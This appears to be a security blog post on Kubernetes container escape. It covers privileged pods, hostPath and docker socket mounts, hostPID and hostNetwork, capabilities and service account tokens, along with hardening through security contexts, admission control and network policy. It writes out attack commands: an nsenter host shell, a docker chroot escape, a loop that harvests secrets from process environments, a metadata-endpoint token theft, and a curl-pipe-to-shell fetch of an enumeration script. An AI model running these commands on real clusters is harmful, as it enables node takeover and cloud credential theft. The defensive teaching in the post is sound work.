Container Escape in Kubernetes: The Attack Paths That Actually Work

A container is not a VM. It's a process running in a restricted namespace with a filtered view of the kernel — same kernel, same underlying hardware. The security boundary is a set of Linux primitives: namespaces, cgroups, seccomp profiles, capabilities, and AppArmor or SELinux policy.

When those primitives are misconfigured, the "container boundary" doesn't exist. And in most production Kubernetes clusters I've reviewed, at least one workload is misconfigured in a way that makes escape trivial.

Here's how it actually works.

The easiest escape: privileged containers

securityContext:
  privileged: true

This is a complete removal of the container security boundary. A privileged container has all Linux capabilities, can see all host devices, can access the host filesystem, and runs with the same privileges as root on the host node.

Once you're in a privileged container, getting to the host is two commands:

# Find the host PID 1 (init/systemd)
nsenter -t 1 -m -u -i -n -p -- bash

nsenter enters the namespaces of another process — in this case, PID 1 on the host. You're now running in the host's mount, UTS, IPC, network, and PID namespaces. You have a root shell on the Kubernetes node.

From there: read /etc/kubernetes/pki/ for cluster CA keys, read kubelet credentials, access the cloud metadata endpoint for the node's service account credentials, read other containers' filesystem layers, or simply install a backdoor.

I find privileged: true most often on logging agents (Fluentd, Datadog), monitoring tools, and anything that needs to read host filesystem paths. Most of those workloads don't actually need full privilege — they need specific capabilities or specific hostPath mounts. Privileged is what you set when you don't want to figure out the minimum.

hostPath mounts

Even without privileged: true, a hostPath mount of the right directory is often sufficient for escape:

volumes:
  - name: docker-sock
    hostPath:
      path: /var/run/docker.sock

Mounting the Docker socket gives any process in the container the ability to run Docker commands on the host:

docker run --rm -it -v /:/host alpine chroot /host

That creates a new privileged container with the host's root filesystem mounted at /host, then chroots into it. You have root on the host.

/var/run/docker.sock is the obvious one, but similar escapes work with:

/var/run/containerd/containerd.sock — same pattern, containerd socket
/proc — access to host processes, their environments, and memory
/sys — control groups and kernel parameters
/etc — if writable, you can modify host configuration
/root or /home — read SSH keys, bash history, credentials

Legitimate hostPath mounts (reading kernel metrics, writing container logs) should use readOnly: true and be scoped to the minimum path:

volumes:
  - name: varlog
    hostPath:
      path: /var/log/containers
volumeMounts:
  - name: varlog
    mountPath: /var/log/host
    readOnly: true

hostPID and hostNetwork

spec:
  hostPID: true
  hostNetwork: true

hostPID: true puts the container in the host's PID namespace. You can now see every process on the node and send signals to them. More usefully from an attacker's perspective: you can read /proc/<pid>/environ for any process, which frequently contains environment variables with secrets:

# Read environment of every process on the host
for pid in /proc/[0-9]*/environ; do
  cat "$pid" 2>/dev/null | tr '\0' '\n' | grep -i 'secret\|key\|password\|token'
done

hostNetwork: true puts the container in the host's network namespace. The most useful thing this unlocks is access to the cloud metadata endpoint at 169.254.169.254, which issues credentials for the node's service account. On GKE:

curl -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token

That returns an access token for the GCE service account attached to the node. On most GKE clusters, node service accounts have at minimum logging.logWriter, monitoring.metricWriter, and storage.objectViewer on the project. If someone over-scoped the node SA (common), this token can reach production GCS buckets, Cloud SQL, or worse.

On EKS, the metadata endpoint hands out the EC2 instance profile credentials. On AKS, you get the managed identity token. Same pattern everywhere.

Linux capabilities

Capabilities break root's traditional all-or-nothing model into discrete privileges. Dropping all capabilities and adding back only what's needed is the correct approach. Most workloads don't need any capabilities at all.

The dangerous ones:

CAP_SYS_ADMIN — the kitchen sink. Allows mount operations, namespace creation, device control, BPF programs, ptrace across containers, and a dozen other things. This single capability enables most known container escape techniques.

CAP_NET_ADMIN — can modify network interfaces, routing tables, and firewall rules on the host if combined with hostNetwork.

CAP_SYS_PTRACE — can trace and inject into any process the container can see. With hostPID, this means any process on the node.

CAP_DAC_OVERRIDE — bypasses file permission checks. Can read files owned by other users/processes even without being root.

CAP_CHOWN and CAP_FOWNER — change file ownership, bypass permission checks on owned files.

The correct security context for most application containers:

securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  runAsGroup: 1000
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop:
      - ALL
    add: []   # only add specific caps if you've verified they're needed

allowPrivilegeEscalation: false prevents processes from gaining more privileges than their parent — specifically, it prevents setuid binaries from working. This is the flag that stops sudo inside a container.

The service account token vector

Every pod gets a mounted service account token by default:

/var/run/secrets/kubernetes.io/serviceaccount/token

An attacker who escapes a container with this token can call the Kubernetes API with the pod's service account permissions. If the service account has broad permissions (see: Kubernetes RBAC misconfigs), this is a cluster takeover path.

For pods that don't need to call the Kubernetes API — most application pods — disable the automount:

spec:
  automountServiceAccountToken: false

Or set it at the service account level to apply to all pods using that SA:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: my-app
automountServiceAccountToken: false

For pods that do need API access, use a dedicated service account with minimal permissions rather than the default SA, which often accumulates bindings over time.

What attackers actually use

Two tools come up in every container escape conversation:

deepce — a shell script that enumerates container escape opportunities. Checks for privileged mode, dangerous capabilities, hostPath mounts, docker socket, writable filesystem, and more. Takes seconds to run.

curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh

CDK (Container Duck Knife) — a Go binary with escape exploits, not just detection. Has specific exploit modules for docker socket, privileged mode, capability-based escapes, and more.

amicontained — shows you your current capabilities and namespace configuration from inside a container.

If you're doing a security review and have exec access to a pod, these three tools will tell you within seconds whether escape is possible and how.

How to stop it: admission control

Pod security contexts are only enforced if something validates them at admission time. You can write the correct securityContext fields in your manifests, but unless an admission controller rejects pods that don't comply, a misconfigured deploy will still run.

Pod Security Standards (PSS) — Kubernetes 1.25+ built-in. Three profiles: privileged (no restrictions), baseline (blocks the worst — privileged containers, most hostPath types, hostPID/hostNetwork), and restricted (requires non-root, drops all capabilities, read-only root filesystem). Apply at the namespace level:

apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted

OPA/Gatekeeper or Kyverno — policy-as-code admission controllers. More expressive than PSS for custom rules. Example Kyverno policy requiring allowPrivilegeEscalation: false:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privilege-escalation
spec:
  validationFailureAction: Enforce
  rules:
    - name: check-privilege-escalation
      match:
        any:
          - resources:
              kinds: [Pod]
      validate:
        message: "Privilege escalation is not allowed."
        pattern:
          spec:
            containers:
              - (name): "?*"
                securityContext:
                  allowPrivilegeEscalation: false

Without admission control, security contexts are advisory. With it, they're enforced at the API server — a misconfigured manifest is rejected before it can run.

Blocking the metadata endpoint

Even if a container can't escape to the host, hostNetwork: true or a misconfigured network policy can let it reach the cloud metadata endpoint and steal node credentials.

On GKE, block metadata endpoint access for pods that don't need it with a NetworkPolicy:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-metadata-endpoint
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 169.254.169.254/32   # block GCP metadata endpoint
              - 169.254.169.253/32   # block GKE metadata server

GKE Autopilot blocks metadata endpoint access by default through the metadata concealment feature. On Standard GKE, enable Workload Identity — it replaces the instance metadata credentials with per-pod credentials, and the node SA's access to GCP is removed entirely.

The security context baseline for production

spec:
  hostPID: false
  hostIPC: false
  hostNetwork: false
  automountServiceAccountToken: false
  securityContext:
    runAsNonRoot: true
    seccompProfile:
      type: RuntimeDefault
  containers:
    - name: app
      securityContext:
        runAsUser: 1000
        runAsGroup: 1000
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
        capabilities:
          drop:
            - ALL

seccompProfile: RuntimeDefault enables the container runtime's default seccomp profile, which blocks a significant set of dangerous syscalls (including several used by known escape techniques) without requiring you to write a custom profile.

This isn't a complete defense — admission control, network policies, and RBAC are all also required — but it's the baseline every production workload should meet.